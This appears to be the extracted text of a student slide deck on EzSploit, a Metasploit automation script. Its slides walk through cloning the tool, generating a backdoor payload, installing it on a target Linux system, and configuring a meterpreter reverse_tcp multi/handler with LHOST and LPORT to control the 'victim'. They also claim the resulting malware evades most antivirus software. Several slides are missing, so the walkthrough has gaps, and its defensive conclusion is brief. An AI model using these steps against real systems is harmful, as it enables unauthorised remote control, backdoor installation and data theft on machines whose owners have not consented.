EzSploit is a Linux bash script that automates the use of Metasploit to hack Linux systems. It allows easy generation of backdoors for Linux, Windows, and Android by compiling payloads and files to target specific platforms. The document outlines how to use EzSploit to create payloads, set up a multi-handler on Kali Linux to receive the payload, install the payload on a target Linux system, and then issue commands through Metasploit's meterpreter shell to control the victim system. It concludes by advising users to keep their systems updated and use antivirus software to protect against backdoors created by tools like EzSploit.
2. CONTENTS
? Introduction
? Kali Linux
? Penetration testing
? The EZsploit
? Introduction to The EZsploit
? Advantages & Disadvantages
? Steps to Hacking Linux with EZsploit
? Payload File Creation
? Sending payload To the Target
? Commands to exploits victim’s Linux
? Conclusion
3. INTRODUCTION ON KALI LINUX
? Debian-basedLinuxdistributionaimedat advanced PenetrationTestingand Security
Auditing.
? ReleaseDate:March13th, 2013.
? Security-focusedversionof Linux that offers a large numberof toolsto seekoutweaknesses
and secure your network.
? Kali containsseveraltools
? Information security tasks
? PenetrationTesting,Securityresearch
? ComputerForensicsand ReverseEngineering
4. ?Also called pentesting
?Testing a computer system/network /Web application to find
vulnerabilities.
BENEFITS:
?Intelligently manage vulnerabilities
?Avoid the cost of network downtime
?Meet regulatory requirements
PENETRATION TESTING
6. EZsploit
?EZsploit :
?Linux bash script automation for Metasploit.
?Metasploit Framework :
?Based on Ruby modular penetration testing platform
?Enables to write, test, and execute exploit code.
?It contains a suite of tools that you can use to test security
vulnerabilities, enumerate networks, execute attacks, and evade
detection.
?It provide a complete environment for penetration testing and
exploit development.
7. ?Easy tool to generate backdoor for Linux, windows and Android
?The tool is able to compile the viruses with popular payloads and then
compile the resulting file to run a specific platform – Linux,Microsoft
Windows, Android
?In addition all malware which have been crafted by The ezsploit can
bypass many of the popular anti-virus software protection features.
?The malware that created with this tool also have an ability to bypass
most AV software
8. Advantages &Disadvantages
? Open source
? Frequently updated
? Easy to deploy
Disadvantages
? Difficult to learn
? Can crash your system if not used wisely
? Requires deep knowledge for exploit development
9. Some other tools Related to:
? FATRAT (taken by Jithu(Linux)
? ARMITAGE(taken by Ayana(Linux))
? EASYSPLOIT (taken by Merin Babu(Linux))
10. HACKING Linux
STEP 1. You need to download ezsploit
git clone https://github.com/rand0m1ze/ezsploit.git
11. STEP2 . execute the command
cd ezsploit
Setting the permission
chmod +x ezsploit.sh
Now you can run this tool easily
./ezsploit.sh
15. STEP 6: Install payload on another system
STEP 7: Set the multi/handler
msf > use exploit/multi/handler
Payload Handlerisa module that provides all the featuresof the metasploit
payload systemto exploit.
STEP 8:Set the payload
msf exploit(multi/handler) > set payload/
Linux/x86/meterpreter/reverse_tcp
16. STEP 9: Set the Local Host
The IP address you want your listener to bind to
msf exploit(handler) > set LHOST 192.168.43.166
STEP 10: Set the Local Port
msf exploit(handler) > set LPORT 6666
17. STEP 13: enter the command ‘Exploit’
We can now interact with the victim & perform different commands.
19. CONCLUSION
?Keep your System up to date.
?Installing antivirus software on your system.
The backdoor application when installed and turned
on the system allows attacker to read, write and
modify data. Cautions are: